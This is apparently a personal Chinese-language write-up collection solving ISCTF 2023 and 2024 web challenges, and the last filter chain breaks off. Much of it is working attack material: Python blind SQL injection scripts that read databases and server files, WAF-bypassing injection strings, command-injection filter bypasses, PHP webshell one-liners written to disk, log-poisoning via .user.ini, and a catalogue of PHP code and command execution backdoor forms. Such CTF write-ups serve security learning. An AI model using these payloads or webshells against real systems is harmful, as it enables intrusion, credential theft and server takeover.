2023

1z_Ssql(sql注入)

username=1' or 1=1#   //illegal words!
username=1'#   //用户名或密码错误
username=-1' or 1 order by 3#   //回显You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=,但是没用,说明等号被过滤了
username=-1' or 1 order by 4#   //用户名或密码错误
username=-1' union select 1,2,3# //illegal words!
username=union  //illegal words!,尝试后双写和大写都不能绕过
username=select //用户名或密码错误
尝试布尔盲注
username=0' or if(substr(database(),1,1)=c,true,false)  //测出来=,like都被过滤了

这里没思路了,扫目录发现/robots.txt,访问可得/here_is_a_sercet.php,得到源码

<?php
highlight_file("here_is_a_sercet.php");

function waf($str){
    $black_list = "762V08zk+xrmKxIFrdJIJj6ULvI8Lc0pX39LjDyIUb0eAGkZe4KQa87TJXuqnFw0u/669wWRsqYFya812FtULw9+tpiGlaH2gleDfDKzr+g=";
    if (preg_match($black_list,$str)){
        die("<h4>illegal words!</h4>");
    }
    return $str;
}

?>

这里看wp才知道涉及到sm4加密

//sm4.js,扫目录中js可得到
const SM4 = require("gm-crypt").sm4;

var payload = "xxx";

let sm4Config = {
    key: "B6*40.2_C9#e4$E3",
    mode: "ecb",
    cipherType: "base64"
};
let sm4 = new  SM4(sm4Config);

var result = sm4.decrypt(payload);

console.log("瑙e瘑:" + result)

image-20250330192523550

源码即为

<?php
highlight_file("here_is_a_sercet.php");

function waf($str){
    $black_list = "/union|=|+|sleep|benchmark|for|where|sys|innodb|is|null|like|/*|*//i";
    if (preg_match($black_list,$str)){
        die("<h4>illegal words!</h4>");
    }
    return $str;
}

?>

法一:布尔盲注

由于可知道用二分法查找来实现布尔盲注,利用成功查询的那个hint来实现盲注,注意,黑名单中有for,不能使用information_schema这个库

import requests

def force(url):
    find=''
    for i in range(1,200):
      found_char=False
      left,right=32,127
      while left<right:
         mid=(left+right)//2
         payload = {
            "username":f"1' or (ascii(substr((database()),{i},1))>{mid})#",
            "password":"1",
            "submit":"%E7%99%BB%E5%BD%95"
            }
         r=requests.post(url=url,data=payload).text
         if ('hint' in r):
            left=mid+1
         else:
            right=mid
      if left>32:
            find += chr(left)
            print(find)
            found_char = True
      if not found_char:
         print("未找到更多字符,库名为"+find)
         break
    
def force1(url):
    find=''
    for i in range(1,200):
      found_char=False
      left,right=32,127
      while left<right:
         mid=(left+right)//2
         payload = {
            "username":f"1' or (ascii(substr((select group_concat(username) from bthcls.users),{i},1))>{mid})#",
            "password":"1",
            "submit":"%E7%99%BB%E5%BD%95"
            }
         r=requests.post(url=url,data=payload).text

         if ('hint' in r):
            left=mid+1
         else:
            right=mid
      if left>32:
            find += chr(left)
            print(find)
            found_char = True
      if not found_char:
         print("未找到更多字符,结果为"+find)
         break


if __name__ =="__main__":
   #指定url
   url='http://gz.imxbt.cn:20502'
   force(url)
   force1(url)

这里看了wp,说的要利用题目给的附件来进行爆破,得到表名和列名,但是没附件,就只能直接盲注,更改最后查询语句中usernamepassword可得到密码

最后用adminwe1come7o1sctf成功登录就能回显flag

image-20250330202159431

法二:loadfileindex.php文件

首先先看下用户权限

import requests

def force(url):
    find=''
    for i in range(1,500):
      found_char=False
      left,right=32,127
      while left<right:
         mid=(left+right)//2
         payload = {
            "username":f"1' or (ascii(substr((select user()),{i},1))>{mid})#",
            "password":"1",
            "submit":"%E7%99%BB%E5%BD%95"
            }
         r=requests.post(url=url,data=payload).text
         if ('hint' in r):
            left=mid+1
         else:
            right=mid
      if left>32:
            find += chr(left)
            print(find)
            found_char = True
      if not found_char:
         print("未找到更多字符,结果为"+find)
         break

if __name__ =="__main__":
   #指定url
   url='http://gz.imxbt.cn:20502'
   force(url)

image-20250330202401130

是以root身份登录到mysql的,可以load_file读取任意本地文件

看启动文件start.sh,用loadfile读,注意这里要更改取值边界范围

import requests

def force(url):
    find=''
    for i in range(1,500):
      found_char=False
      left,right=0,128
      while left<right:
         mid=(left+right)//2
         payload = {
            "username":f"1' or (ascii(substr((load_file('/start.sh')),{i},1))>{mid})#",
            "password":"1",
            "submit":"%E7%99%BB%E5%BD%95"
            }
         r=requests.post(url=url,data=payload).text
         if ('hint' in r):
            left=mid+1
         else:
            right=mid
      find += chr(left)
      print(find)
      found_char = True
      if not found_char:
         print("未找到更多字符,结果为"+find)
         break

if __name__ =="__main__":
   #指定url
   url='http://gz.imxbt.cn:20502'
   force(url)

image-20250330204135697

可以看到它把flag写入到了index.php,且泄露出了其绝对路径,直接load_file读

import requests

def force(url):
    find=''
    for i in range(1,500):
      found_char=False
      left,right=0,128
      while left<right:
         mid=(left+right)//2
         payload = {
            "username":f"1' or (ascii(substr((load_file('/var/www/localhost/htdocs/index.php')),{i},1))>{mid})#",
            "password":"1",
            "submit":"%E7%99%BB%E5%BD%95"
            }
         r=requests.post(url=url,data=payload).text
         if ('hint' in r):
            left=mid+1
         else:
            right=mid
      find += chr(left)
      print(find)
      found_char = True
      if not found_char:
         print("未找到更多字符,结果为"+find)
         break

if __name__ =="__main__":
   #指定url
   url='http://gz.imxbt.cn:20502'
   force(url)

但是爆了半个小时没出来,理论成立

绕进你的心里(php特性)

<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){
    echo "md5绕过了!";
    if(preg_match("/[0-9]/", $num)){
        die('你干嘛?哎哟!');
    }
    elseif(intval($num)){
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }
        echo $flag;
    }
}
?>

数组绕过MD5,intval() 转换数组类型时,不关心数组中的内容,只判断数组中有没有元素。PCRE回溯次数限制绕过来绕过preg_match()函数的检测

preg_match函数处理的字符长度有限,如果超过这个长度就会返回false也就是没有匹配到。

hongmeng[]=1&shennong[]=2&zhurong[]=2023ISCTF
import requests
 
url = "http://gz.imxbt.cn:20524//?hongmeng[]=1&shennong[]=2&zhurong[]=a"
 
data = {
    'pan_gu': 'aaaaaaaaaa' * 250000 + '2023ISCTF'
}
r = requests.post(url, data=data)
print(r.text)

easy_website(sql注入)

还是sql注入

username=1' or 1=1#   //根据报错发现空格,or被过滤
username=1'/**/||1#   //登录成功
username=1'/**/order/**/by/**/4#  //发现or被过滤
username=1'/**/oorrder/**/by/**/4#  //错误列数
username=1'/**/oorrder/**/by/**/1#  //用户名或密码错误
username=1'/**/union/**/select/**/database()#  //union和select都被过滤
username=1'/**/uunionnion/**/sselectelect/**/1#  //成功登录,1为回显位
username=1'/**/uunionnion/**/sselectelect/**/database()#  //users
username=1'/**/uunionnion/**/sselectelect/**/(seselectlect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='users')#  //users
username=1'/**/uunionnion/**/sselectelect/**/(seselectlect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users')#  //id,username,password,ip,time,user,password
username=1'/**/uunionnion/**/sselectelect/**/(seselectlect/**/group_concat(passwoorrd)/**/from/**/users)#   //ISCTF{6da56c3d-73fe-43f4-bdda-832edc9d1736}

webinclude(文件包含)

扫目录发现备份文件/index.bak,获得源码如下

 function string_to_int_array(str){
        const intArr = [];

        for(let i=0;i<str.length;i++){
          const charcode = str.charCodeAt(i);

          const partA = Math.floor(charcode / 26);
          const partB = charcode % 26;

          intArr.push(partA);
          intArr.push(partB);
        }

        return intArr;
      }

      function int_array_to_text(int_array){
        let txt = '';

        for(let i=0;i<int_array.length;i++){
          txt += String.fromCharCode(97 + int_array[i]);
        }

        return txt;
      }


const hash = int_array_to_text(string_to_int_array(int_array_to_text(string_to_int_array(parameter))));
if(hash === 'dxdydxdudxdtdxeadxekdxea'){
            window.location = 'flag.html';
          }else {
            document.getElementById('fail').style.display = '';
          }

直接写个解码脚本,获得原始参数为mihoyo,直接伪协议读取就行

def int_array_to_text(int_array):
    # 将整数数组转换为文本
    return ''.join(chr(97 + i) for i in int_array)

def text_to_int_array(text):
    # 将文本转换为整数数组
    return [ord(c) - 97 for c in text]

def reverse_string_to_int_array(int_array):
    result = []
    # 每两个元素一组,还原原始的 ASCII 值
    for i in range(0, len(int_array), 2):
        partA = int_array[i]
        partB = int_array[i + 1]
        original_char_code = partA * 26 + partB
        result.append(original_char_code)
    return ''.join(chr(code) for code in result)

# 已知的 hash 值
hash_value = "dxdydxdudxdtdxeadxekdxea"

# 第一步:将 hash 转换为整数数组
int_array_from_hash = text_to_int_array(hash_value)

# 第二步:逆向解码整数数组,得到中间的字符串
intermediate_str = reverse_string_to_int_array(int_array_from_hash)

# 第三步:再次对中间字符串进行逆向解码
final_parameter = reverse_string_to_int_array(text_to_int_array(intermediate_str))

print("原始参数 (parameter):", final_parameter)
mihoyo=php://filter/read=convert.base64-encode/resource=flag.php

$flag = “ISCTF{00b0c051-8782-48b7-9c65-fc8686418395}”;

Where is the flag

<?php
//flag一分为3,散落在各处,分别是:xxxxxxxx、xxxx、xxx。
highlight_file(__FILE__);

//标准一句话木马~
eval($_POST[1]);
?>
1=system("ls");   //flag.php index.php
1=system("tac flag.php");    //FLAG1:ISCTF{Y0u_6u
1=system("tac /flag");   //FLAG2:cceeded_in_f
1=system("tac /flag.sh");   //FLAG3=ind1n9_f1ag}

ISCTF{Y0u_6ucceeded_in_find1n9_f1ag}

。。。。。结果错了,又去看了下题,原来在环境变量中

image-20250411000008626

ISCTF{8e1a7953-1020-486b-af07-9a0a7c53c9cc}

Fuzz!

<?php
/*
Read /flaggggggg.txt
Hint: 你需要学会fuzz,看着键盘一个一个对是没有灵魂的
知识补充:curl命令也可以用来读取文件哦,如curl file:///etc/passwd
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
$file = 'file:///etc/passwd';
if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){
    die('你需要fuzz一下哦~');
}
if(!preg_match("/fi|le|flag/i", $_GET['file'])){
    $file = $_GET['file'];
}
system('curl '.$file);

image-20250411000237916

fuzz一下可以看到-./{|}[]被放出来了

遇到这种可以先考虑绕过

file=127.0.0.1|ls /  //flag flaggggggg.txt
file=127.0.0.1 | tac /f[j-m]aggggggg.txt

ISCTF{Fuzz_is_a_great_trick_Did_you_find_curly_braces?-Jay17}

也可以按照题目给的提示,用大括号绕过

file=f{i}l{e}:///f{l}aggggggg.txt

。。。。。。。。。。。。。虽然但是,怎么又是在环境变量中

image-20250411001140277

ISCTF{cb477fe0-d027-457f-a3e1-2160f114f13d}

wafr

<?php
/*
Read /flaggggggg.txt
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);

if(preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $_POST['code'])){//strings
    die("想读我文件?大胆。");
}
elseif (preg_match("/\^|\||\~|\\$|\%|jay/i", $_POST['code'])){
    die("无字母数字RCE?大胆!");
}
elseif (preg_match("/bash|nc|curl|sess|\{|:|;/i", $_POST['code'])){
    die("奇技淫巧?大胆!!");
}
elseif (preg_match("/fl|ag|\.|x/i", $_POST['code'])){
    die("大胆!!!");
}
else{
    assert($_POST['code']);
}

简单rce,直接命令执行绕过就行

code=system("ls")?>    //flaggggggg.txt index.php
code=system("ta\c f*")?>

预期解应该是用strings

code=system("strings f*")?>

ez_ini

常规传.user.ini不行,过滤了文件内容中的<,导致php代码不能被执行,那么可以尝试通过.user.ini和日志文件配合进行日志注入

user.ini:auto_append_file=/var/log/nginx/access.log
UA:<?php eval($_POST[123]);?>

2024

1z_php

<?php
highlight_file('index.php');

#一句话木马,神神又奇奇

if(isset($_POST['J'])){
    $call=$_POST['J'];
    $dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od'];
    foreach ($dangerous_commands as $command) {
        if (preg_match("/$command/i", $call)) {
            die("这些个危险函数可不兴使啊");
        }
    }
    system($call);
}
?>

ban了些读取文件的命令,可使用strings绕过

读取绕过

J=ls
J=strings /f14g  #strings会提取文件中的可打印字符
J=ca\t /f14g     #反斜杠绕过
J=grep { /f14g  #grep是用来查找字符串的,在这里我们查找{他会输出含有{的那一行
J=c''at /f14g   #''在bash中会被解释为空字符串,当flag被禁时也可以用
J=cp /f14g /var/www/html/index.php  #将/f14g的内容拷贝到index.php,index.php的内容会被覆盖

image-20250203163711839

传马

false:J=echo '<?php @system($_POST['123']);?>' > a.php
true:J=echo '<?php @eval($_POST['123']);?>' > a.php

然后蚁剑访问a.php连接后就可以获得flag了

但是在这里就涉及到第一次传马失败的知识点,system()函数和eval()函数区别

补充:system()函数和eval()函数区别

区分

eval类型函数是代码执行而不是命令执行(一句话木马)

system类型函数是命令执行而不是代码执行

具体来说,就是eval()函数将字符串作为代码执行。可以执行任何合法的编程语言语句或表达式,而sysstem()函数调用操作系统的命令解释器(如Shell)来执行指定的命令

举例

<?php
    eval("echo 1+1;");    //2
    system("echo 1+1;");  //1+1;
?>

    
<?php
    $num=1;
    eval("\$a = $num;");    //有效,$a=1
    system("\$b = $num;");  //无效,$b=NULL  
?>

代码执行函数

1-eval
<?php eval($_POST["cmd"]) ?>

2-assert
<?php assert($_POST["cmd"]) ?>

3-call_user_func
<?php
    call_user_func($_POST["fun"],$_POST["para"])
?>
//post:fun=assert&para=phpinfo();

4-create_function
<?php 
    $a= $_POST['func'];
    $b = create_function('$a',"echo $a");
    $b('');
?>
//post:func=phpinfo();

5-array_map
<?php
    $array = array(0,1,2,3,4,5);
    array_map($_GET['func'],$array);
?>
//post:func=phpinfo

命令执行函数

1-system
<?php system($_POST["cmd"]);?>

2-passthru
<?php passthru($_POST["cmd"]);?>

3-exec
<?php echo exec($_POST["cmd"]);?>

4-pcntl_exec
<?php 
    pcntl_exec("/bin/bash",array($_POST["cmd"]));
?>

5-shell_exec
<?php echo shell_exec($_POST["cmd"]); ?>

6-popen()/proc_popen()
<?php $handle = popen("/bin/ls","r");?>

7-``
<?php echo `whoami`?>

8-
<?php
	$cmd = 'system';
	ob_start($cmd)
	echo "$_GET[a]";
	ob_end_flush();
?>
//?a=whoami

c71ce3259d0c7fbd0cff3db9aa266d10

224dbf35c723734d5b4c51efff2a7042

25时晓山瑞希生日会

image-20250204164050726

进入环境就提示需要Project Sekai的客户端请求,抓包更改UA

User-Agent: Project Sekai

然后要正确时间,根据题目描述添加时间 不知道年月日好像随便一个都行?

Date:Tue, 15 Nov 2010 9:15:31 GMT

image-20250204164500754

提示本地来,添加X-Forwarded-For

X-Forwarded-For:127.0.0.1

image-20250204164550076

好吧,还是限制了时间,更改时间就行

Date:Tue, 15 Nov 2024 05:01:31 GMT

image-20250204164714902

又结束了?????再改时间吧

Date:Tue, 15 Nov 2024 25:01:31 GMT

image-20250204164924905

提示格式不对,搜索后更改格式和时间

Date: Sun, 27 Aug 2024 05:00:00 GMT

image-20250204165355864

拿到flag

UP!UPloader

随便上传一个文件发现有include.php,访问发现为文件包含

image-20250204165752103

filename=php://filter/read=convert.base64-encode/resource=upload.php

成功读取文件内容,解码后源码如下

<?php
error_reporting(0);
$file = $_FILES['file'];
if (isset($file) && $file['size'] > 0) {
    $ext = pathinfo($file['name'], PATHINFO_EXTENSION);
    $name = pathinfo($file['name'], PATHINFO_FILENAME);
    $dir_name = $name . '.' . $ext;
    $upload_dir = './uploads/';
    if (!is_dir($upload_dir)) {
        mkdir($upload_dir, 0755, true);
    }
    if (move_uploaded_file($file['tmp_name'], $upload_dir . md5($dir_name) . '.' . $ext)) {
        echo "文件上传成功!不过文件路径可不好找呀~什么?什么include.php?我不知道啊。" ;
    } else {
        echo "文件存储失败,未知原因......";
    }
    die();
}
?>

image-20250204170217426

因此直接访问上传目录下的md5加密后文件名传马即可

这里我传的是1.php,加密后为f3b94e88bd1bd325af6f62828c8785dd.php,蚁剑连接就行

image-20250204170950538

其实没找到,flag藏在phpinfo()页面了,除了phpinfo();还可以通过system('env');找到

image-20250204171435076

image-20250204171637956

ezrce

<?php

error_reporting(0);

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];

    if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
        die("Blocked by security filter!");
    } else {
        eval($cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>

ban了挺多函数,但是十六进制那个未被ban,因此直接绕过

cmd=(sy.(st).em)(hex2bin("6c73202f"));  //十六进制为ls /
cmd=(sy.(st).em)(hex2bin("636174202f666c6167"));  //十六进制为cat /flag

其他payload

cmd=passthru('cd%09..;cd%09..;cd%09..;strings%09[a-z]lag'); //system 可以用 passthru 代替,过滤了 /,可以通过 cd .. 进行绕过,然后文件读取同样 strings 即可
cmd=include$_GET[1];&1=php://filter/convert.base64-encode/resource=/flag

小蓝鲨的冒险

<?php
error_reporting(0);
highlight_file(__FILE__);
$a = "isctf2024";
$b = $_GET["b"];
@parse_str($b);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { //通过数组传一个MD5加密后为0e开头的进去,比如240610708
    $num = $_POST["num"];
    if($num == 2024){
        die("QAQ");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0) == 2024){ //小数绕过或八进制绕过
        if (isset($_GET['which'])){
            $which = $_GET['which'];
            switch ($which){
                case 0:
                    print('QAQ');
                case 1:
                case 2:
                    require_once $which.'.php';
                    echo $flag;
                    break;
                default:
                    echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);
                    break;
            }
        }
    }
}

payload

GET b=a[0]=240610708&which=flag
POST num=2024.1或num=03750

image-20250204174928730

千年樱

第一层

先添加cookie

cookie:from=ISCTF

image-20250204180054510

第二层

<?php
   include "dir.php";
   highlight_file(__FILE__);

   if(file_get_contents($_POST['name']) === 'ISCTF'){
        echo $dir2;
    }
   else{
        die("Wrong!");
    }
 ?>

直接用data伪协议

name=data://text/plain,ISCTF

image-20250204180351322

第三层

<?php
    include "dir.php";
    highlight_file(__FILE__);

    function waf($str){
        if(preg_match("/http|php|file|:|=|\/|\?/i", $str) ){
            die('bad hacker!!!');
        }
    }
    $poc = $_POST['poc'];
    waf($poc);
    $filename = "php://filter/$poc/resource=/var/www/html/badChar.txt";
    $result = file_get_contents($filename);
    if($result === "sakura for ISCTF"){
        echo "yes! master!";
        eval($_POST['cmd']);
    }

    if($_GET['output'] == 114514 && !is_numeric($_GET['output'])){
        var_dump($result);
    }


    ?>

 我们可以用神奇的php_filter_chain_generator工具构造filter链:

python php_filter_chain_generator.py --chain sakura for ISCTF<?php
poc=convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.